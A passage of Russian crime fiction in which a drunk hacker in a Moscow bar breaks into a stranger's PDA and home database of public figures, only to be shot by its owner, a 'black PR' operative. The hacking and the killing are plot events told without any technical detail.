«Так... Попугай, попугай... Телефон... Включен?.. Да. Как это может 
быть? Наладонник? Что-то тыкает стилом... Только не привлекать внимания, 
только не привлекать...» 

В этот момент он споткнулся и едва не упал. Человек поднял на него 
глаза лишь на мгновенье и продолжил свое занятие. Судя по всему, сейчас 
никто не мог отвлечь его от работы. 


— Цыпа-цыпа, — проговорил заплетающимся языком Сергей, постучал по 
клетке ногтем и спросил у птицы: — Сидишь? Ну-ну, сиди-сиди. Пива не хо- 
чешь? 


Попугай смотрел на него одним глазом — одновременно презрительно, 
словно недолюбливал пьяных, и недоверчиво. 

— Ладно, хрен с тобой, — махнул Малышев рукой и напоследок кинул внима- 
тельный взгляд на экран наладонника. — Пойду я, раз тебе пива не надо. 

Охранник проводил его внимательным взглядом, но решил, что, судя по 
всему, подвыпивший клиент не собирался хулиганить. 

Малышев вернулся на место и быстро, одним большим глотком, допил 
все пиво в кружке, не обращая внимания на то, как по ней катятся крупные 
капли конденсата, падая ему на грудь. 

— Мажор... Мажо-о-о-р! Твою мать... Зачем я так набрался? Сейчас бы ясные 
мозги... Интересно, у меня с собой много всяких примочек есть? Или поле- 
нился лишний раз перекачать? 

Он ткнул пальцем в кнопку ОК, отметил начало синхронизации данных 
между наладонником и ноутбуком, потом еще несколько секунд радовался 
той программе, которую написал сам, — безо всякой авторизации входишь в 
доверие любого устройства, которое общается с окружающим миром без по- 
мощи проводов. 

Парень за столом занервничал на несколько секунд. Похоже, во время 
интенсивного обмена данными его компьютер стал подтормаживать, но толь- 
ко ненадолго. Скорость работы быстро восстановилась, он снова стал нажи- 
мать на экран стилом, совершая какие-то операции. Сергей тем временем 
смотрел на экран ноутбука, изучая полученную информацию. 

Этой самой информации было достаточно. Вот только она была какой- 
то сумбурной: набор документов, какие-то фотографии, статьи, выдернутые 
из интернета с новостных сайтов. Отдельно шла подборка анекдотов про по- 
литиков, звезд шоу-бизнеса, просто известных публичных людей. 

— Странно все это, — прошептал Малышев, не замечая того, что творится 
вокруг. Тем временем официантка подошла к нему, пыталась заговорить, но 
он не обратил на нее внимания. Она вздохнула, заменила пустую кружку пи- 
ва на полную и ушла. 

— Прежде чем ставить себе задачу, надо понять, что я хочу, — сказал Малы- 
шев сам себе. — А пока сложно сказать, что можно хотеть от этого бардака. 
Вполне возможно, что пользы-то нет никакой. Пустышка. И я на девяносто 
процентов прав. Или нет? 

Он машинально протянул руку к пиву, отхлебнул и даже не удивился то- 
му, что кружка снова полна. Информация притягивала его своей полной не- 
информативностью. Так не могло быть и так было. 

— Человек удовлетворяет свой информационный голод путем собирания 
различных данных в интернете. Все, что он получает из Сети, имеет объясне- 
ние. Все, включая случайные файлы. Информация может быть систематизи- 
рована только одним способом, известным хозяину. Значит, надо попытаться 
мыслить иначе — не то чтобы нестандартно, просто не так, как мыслишь сам. 

Хотя его мозг был одурманен алкоголем, он размышлял достаточно ло- 
гично, вот только не мог избавиться от дурацкой привычки пускаться в рас- 
суждения с самим собой и делать это исключительно вслух. 

— Зачем человеку такая куча страниц, выкачанных сайтов, фотографий и 
остального хлама, которого в интернете полным-полно, рубль за тонну берут? 


Может, чтобы понять, есть смысл рвануть дальше? К нему домой или где там он 
хранит все остальное? Наверняка дома серьезная машина, не удивлюсь если 
«Макинтош». Такие, как он, любят дорогие альтернативы. Итак, для начала идем 
в закладки... Обычно все лежит на поверхности, надо только наклониться и взять. 

Он прошелся по наладоннику, как по своей кухне, выбрал всю необхо- 
димую информацию, оставил в покое Bluetooth и стал использовать возмож- 
ности, предоставленные рестораном за пиво, которое он пьет сейчас в этом 
зале. Его хакерский набор благополучно ждал своего часа на ноутбуке, Сер- 
гей воспользовался им для проникновения в базу данных своего внезапно по- 
явившегося противника, хотя он являлся им лишь по образу жизни, да и «про- 
тивником» это назвать было трудно — все-таки свел их случай, не более. 

На домашнем компьютере его ждала еще одна куча интернет-барахла, 
на этот раз разобранная и систематизированная. По именам, по профес- 
сиям, по месту жительства и работы. Ключей в таблицах было еще великое 
множество — найти любого человека в них не составило бы никакого труда. 
— Ксения Собчак... — шептал Малышев, вводя имена в строку поиска и не 
удивляясь тому, что удавалось найти любого человека в течение пары секунд. 
— Касьянов... Алина Кабаева... Константин Эрнст... 

Попадались люди, помеченные разными цветами. Строки черного и си- 
него цветов бросались в глаза. Малышев отметил про себя, что в черных 
полях люди, которых уже нет живых, в синих — те, кто находится в розыске 
или сидит в тюрьме, то есть, короче говоря, в настоящее время имеет пробле- 
мы с законом. 

Черные строки подтолкнули его к очень и очень нехорошей мысли... 
— Парень киллер? 

Еще один большой глоток из кружки. 

— Чушь какая-то! Но, с другой стороны, для чего ему это кладбище? 

Людей, помеченных черным, было действительно довольно много. Сре- 

ди них губернатор Алтая Михаил Евдокимов, парочка банкиров со звучными 
фамилиями, двое телеведущих и очень высокопоставленный чин из Мини- 
стерства обороны. В синих полях Малышев не удивился Ходорковскому с Бе- 
резовским, полистал базу еще и понял, что «несть им числа». 
— Ладно, хорошо, раз не можем понять, зачем все это, зайдем с другого бо- 
ка. Попробуем понять, что он делает сейчас. Может, удастся понять принцип 
сортировки, занесения людей в таблицы, вдруг сумею уловить, зачем все это 
нужно?! 

Он стал отслеживать все то, что происходило между наладонником и 

домашним компьютером в режиме реального времени, между делом объяс- 
нял сам себе вслух: 
— Вряд ли он киллер. Ведь в базе данных около четырех тысяч человек. Чер- 
ных строк там вряд ли больше тридцати... Похоже, чтобы убить или посадить 
в тюрьму весь этот список, парню понадобится не один десяток лет. Не ду- 
маю, что он пойдет на такое. Скорее всего, здесь что-то другое. Что-то очень 
похожее, но что? 

На экране ноутбука в таблицах менялись строки, менялись какие-то по- 
ля, к фамилиям приписывались достаточно запутанные аргументы, ставились 
разного рода символы. Несколько раз мелькнуло слово «Out»: кого-то парень 
только что вывел из игры, отправив в конец списка, именно там копились лю- 
ди с этим аргументом. 

— А может, не вывел из игры? Может, они уже отыграли? 

Он прочитал одну из фамилий в конце списка — те, что были в группе 

«out». Она показалась ну уж очень знакомой, вот только он не мог сразу 
вспомнить, кто этот человек. Пришлось бросить исследования, выйти на но- 
востной сайт, найти хоть что-нибудь... Точно! Это оказался достаточно высо- 
кий чин в спортивном министерстве, который недавно был смещен со своего 
поста за довольно непредсказуемые действия в состоянии алкогольного 
опьянения. Смещен, опозорен в прессе и на телевидении, о нем даже упомя- 
нули в передаче «Человек и закон», что уже само по себе означало доволь- 
но высокий уровень конфликта. 
— Сместили с поста — и вон из списка, — проговорил Малышев. — Смести- 
ли... Смерть руководителя как руководителя — иной раз для человека это 
страшнее истинной физической смерти. Оказаться на самом верху, а потом 
вернуться к истокам. Не у всякого хватит выдержки и нервов. Этот, правда, 
ничего с собой не сделал — похоже, правильно убрали дебошира... 

Он посидел еще минуту и сказал: 

— Этот человек собирает информацию о тех, кто может упасть. О тех, кого 
можно свалить. О тех, кто играет хоть какую-то роль в нашей жизни. Но за ка- 
ким чертом ему эта информация? 

Музыка, которая к тому времени стала погромче, не отвлекала его от 
размышлений. Пара музыкантов вышли на сцену, один включил компьютер, 
другой принялся настраивать гитару. У них за спинами засветилась надпись 
«Командоры». Певица с приличными для ее невысокого роста формами, чем- 
то напоминающая Ларису Долину, включила микрофон и тихо произнесла: 
— Один, два, раз... 

Малышев и парень за соседним столиком синхронно подняли глаза 
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на сцену и тут же снова окунулись каждый в свой мир. Сергей снова посмо- 
трел на загадочные строчки: 

— Есть еще способ: посмотрим, кто у него в адресной книге и в контакт-листе. 
Скажи мне, кто твой клиент, и я скажу, кто ты. Пороемся в грязном белье... 

Он без особого труда получил доступ к почтовому ящику, прочитал кор- 
респонденцию, пришедшую за вчера, и едва не получил ту, которая поджида- 
ла хозяина на сервере сегодня, но вовремя одернул себя — это выглядело бы 
подозрительно. 

— Не надо спешить. Он еще поможет мне сам... А что у нас в контактах? 

Ники ему ничего не говорили. Так же, как и письма в почтовике. 

— Какой-то тупик, черт возьми! — стукнул он кулаком по столу. — Его база 
данных — это просто ужас какой-то! Не может такая информация храниться 
на компьютере в столь систематизированном виде безо всякого смысла! Все 
это кому-то нужно! Кто-то хочет, чтобы все эти данные были здесь! Хочет! 

Он, крайне рассерженный тем, что не может подобрать ключ к разгад- 

ке, отсел от стола и закинул ногу на ногу. Никогда он еще не был так зол на 
самого себя. 
— Какая-то гробница фараона! — глядя с расстояния на экран ноутбука, 
сквозь зубы процедил Малышев. — Тутанхамон хренов! Вот, например, зачем 
ему нужны сведения о Чубайсе? Что он может сделать с этим человеком? Кто 
в этой стране может противопоставить хоть что-нибудь главе такого концерна? 
— Вы еще пиво будете? — вдруг раздалось сбоку. Сергей вздрогнул и увидел 
перед собой официантку. — А то у нас правило такое: если клиент кружку 
ставит на картонку, значит, он хочет еще. 

Малышев увидел, что пустая кружка стоит на фирменной картонке, маши- 
нально кивнул и снова увидел перед собой стройные ноги в сетчатых колготках. 
Девушка заметила, что он не отрываясь смотрит на ее ноги, и засмущалась. 
— Что вы там такого увидели? У меня чулки порвались? — спросила она, то- 
же посмотрев вниз. 

— Чулки... — прошептал Малышев. — Это покруче будет... 

Он представил себе черную резинку шириной с ладонь, скрытую сей- 
час короткой юбкой девушки, раздел ее глазами и усмехнулся. 

— Эротика — это адреналин, — неожиданно сказал он девушке. — А на ад- 
реналине я сейчас соображу, что к чему. 

— Какая эротика? — еще больше смутилась официантка. — Я лучше за пи- 
вом пойду. 

«Странный какой-то», — думала она, идя к бару и не замечая, что Ма- 
лышев неотрывно смотрит на ее ноги, прислушиваясь к приятным ощуще- 
ниям в груди, которые назывались «либидо». Сердце забилось сильнее. Он 
совершенно четко хотел эту девушку — прямо сейчас и здесь. 

А потом еще раз впился глазами в ее чулки. 

Сетка. Сетка. 

Сетка. 

— Рыбак, твою мать! — взвился Малышев. — Сеть! Он сам использует эту ин- 
формацию! Это его работа! Забрасывать сети и вылавливать крупную рыбу, 
сгоняя ее в самый низ списка, выводя из игры. Он — человек, который дела- 
ет «черный пиар»! 

Адреналин в очередной раз не подвел его. Теперь осталось придумать, 
что сделать с этой отгадкой. 

Тем временем человек за столиком прекратил заниматься своим нала- 
донником, взглянул на экран мобильного телефона, покачал головой (тут Ма- 
лышев понял, что он просто смотрел на часы). Затем встал и вернулся за 
свой столик — за тот, где сидел с самого начала. 

Сергей проводил его взглядом исподлобья, после чего еще раз посмо- 
трел на экран, где оставалась открытой часть таблицы из чужой базы данных. 
С ней нужно было что-то делать. 

— Если предположить, что этот человек — тот, кем я его представил себе, то 
вся инфа на его компе крайне актуальна. А любую актуальную информацию 
можно использовать. 

И Малышев аккуратно перекачал всю базу себе на ноутбук — инфор- 
мация стоит денег. 

Когда думаешь о деньгах, редко смотришь по сторонам... 


ке 


Время шло достаточно быстро. За работой Максим всегда удивлялся его хо- 
ду. Стрелки часов совершали какие-то непонятные скачки по циферблату, 
выхватывая из жизни целые куски. 

Вот и сейчас около сорока минут просто улетучились, испарились, пре- 
вратились в ничто, но за это время он успел свести воедино несколько очень 
интересных фактов, при помощи которых можно было свалить со своего по- 
ста одного очень большого чиновника из прокуратуры. Хорошо выполненная 
работа всегда приносила ему удовлетворение. Он сделал пару денежных пе- 
реводов своим информаторам, представил на минутку ту сумму, которая пе- 
рекочевала с анонимных банковских счетов на его кредитку, и вернулся за 
свой столик в ожидании Татьяны. 


Отметив про себя, что девушка временами бросает в его сторону взгля- 
ды, полные любопытства и нетерпения, Максим осмотрел зал, послушал па- 
ру песен в исполнении группы, которая в настоящий момент оккупировала 
сцену, оценил неплохие вокальные данные певицы. Достал наладонник и сел 
так, чтобы скрыть свои действия от парня, который бродил вокруг него, яко- 
бы рассматривая попугая... 

Татьяна подошла незаметно и опустилась в кресло рядом. Максим 
вздрогнул, поднял на нее глаза, да так и не смог их отвести. Она, сняв с се- 
бя униформу и преобразившись в вечернем наряде, стала практически неуз- 
наваемой. Сердце молодого человека забилось сильнее, он машинально 
протянул руку и прикоснулся к кончикам ее пальцев. Она не убрала руку. 

— Мне кажется... — произнес Максим. — Мне кажется, что мы нравимся друг 
другу. 

— Не без этого, — улыбнулась Татьяна. — Но это не значит, что здесь, в 
«Амазонии», я знакомлюсь со всеми клиентами, которые мне нравятся. От- 
нюдь, скорее наоборот. Максим, ты первый, с кем я тут общаюсь на подоб- 
ном уровне. Смотри, как все на нас косятся... 

Молодой человек аккуратно осмотрелся. Действительно, несколько 
девчонок-официанток о чем-то шушукались у стойки бара, временами бро- 
сая взгляды на их столик. 

— Репутация не пострадает, Татьяна? — спросил он у девушки. 
— Думаю, что нет. Я здесь на хорошем счету. И могу при желании выдать все 
это за встречу со старым знакомым. Если у нас, конечно, ничего не выйдет. 

Максим оценил последние слова Тани, потом спросил: 

— Посидим еще или пойдем куда-нибудь в другое место? 

— Вообще-то работать и отдыхать в одном месте считается неприличным... 
Но уж очень хочется, чтобы мне подали ужин сюда. 

— Ужин? Все-таки здесь? — улыбнулся Максим. — Вот и чудесно. И мне кажет- 
ся, что меню нам не нужно — ты наверняка его знаешь. Поэтому прошу — на 
твой вкус. Все, что пожелаешь. И бутылку хорошего дорогого красного вина. 

Татьяна посмотрела в сторону бара и сделала жест по направлению к 
девушкам. Они замерли, потом расступились, оставив только одну — ту, ко- 
торой выпало обслуживать столики с этого края сцены. 

— Ты пока заказывай, а у меня есть пара дел, хочется их завершить до начала 
нашего романтического свидания, — произнес Максим и направился к выходу. 

Татьяна проводила его взглядом и принялась заказывать ужин. В мы- 
слях у нее уже давно созрело меню. Она быстро перечислила все то, что хо- 
тела бы сейчас съесть и выпить, незаметно оглядела себя в зеркало и оста- 
лась довольно макияжем и туалетом. 

Ждать Максима пришлось недолго. Через пару минут он уже спускался по 
лестнице вниз, держа в руках огромный букет роз (спасибо бабушкам, которые ус- 
певают за ночь объехать пол-Москвы, чтобы продать свои букеты нуждающимся). 

Вот только почему-то он пошел не сразу к ней, а свернул туда, где си- 
дел до этого. 

К попугаю... 

Появился перед ней минут через десять. Татьяна уже успела переду- 
мать бог весть что на тему того, к кому же этот красавец бизнесмен мог за- 
вернуть с букетом роз в полупустом зале, — и в эту самую секунду перед гла- 
зами возник красный взрыв из девяти роскошных цветков. Она едва удержа- 
лась от вскрика — настолько неожиданно это было. 

Максим улыбнулся, протянул цветы. Она с радостью приняла их, вдох- 
нула аромат... Что-то странное было в этом аромате, какие-то чуждые розам 
нотки, но официантка быстро принесла вазу, она поставила туда цветы и за- 
была о странном факте. 

«Заметила, — понял Максим. — Как ни крути, заметила. Ну и черт с ним. 
Всегда можно объяснить... Да ладно, чего я все об этом...» 

Запах пороха. Конечно же, Татьяна почувствовала его, но не поняла, не 
распознала. Не удивительно: чтобы узнавать запах пороха, надо время от 
времени стрелять... 

Пистолет он успел спрятать: купив букет роз на улице, он вынул оружие 
из машины и спрятал среди цветов. Застрелить парня с ноутбуком было делом 
одной секунды. Он всего лишь сделал вид, что встретил старого знакомого, 
подсел, поговорил и оставил его одного отдыхать... Больше времени потребо- 
валось на то, чтобы вынуть из ноутбука винчестер — слава богу, он оказался 
на салазках, а Максим уже было собирался воспользоваться отверткой. 

Не первый раз ему пытались подставить подножку, залезая в его базу. 
Наладонник, словно верная собака, тут же известил о взломе, но Максим, го- 
товый к подобному развитию ситуации, ничем не выдал себя, закончил свою 
работу и сумел вычислить обидчика. 

Теперь горячий глушитель грел ему живот, перед ним сидела самая кра- 
сивая женщина в мире, их радовал накрытый стол и игра вина в бокалах, на 
кредитную карточку вновь начислена новая сумма денег. 

— «Амазония», — произнес он, словно пробуя слово на вкус. — Надо бывать 
здесь почаще. 

И они подняли бокалы... № 
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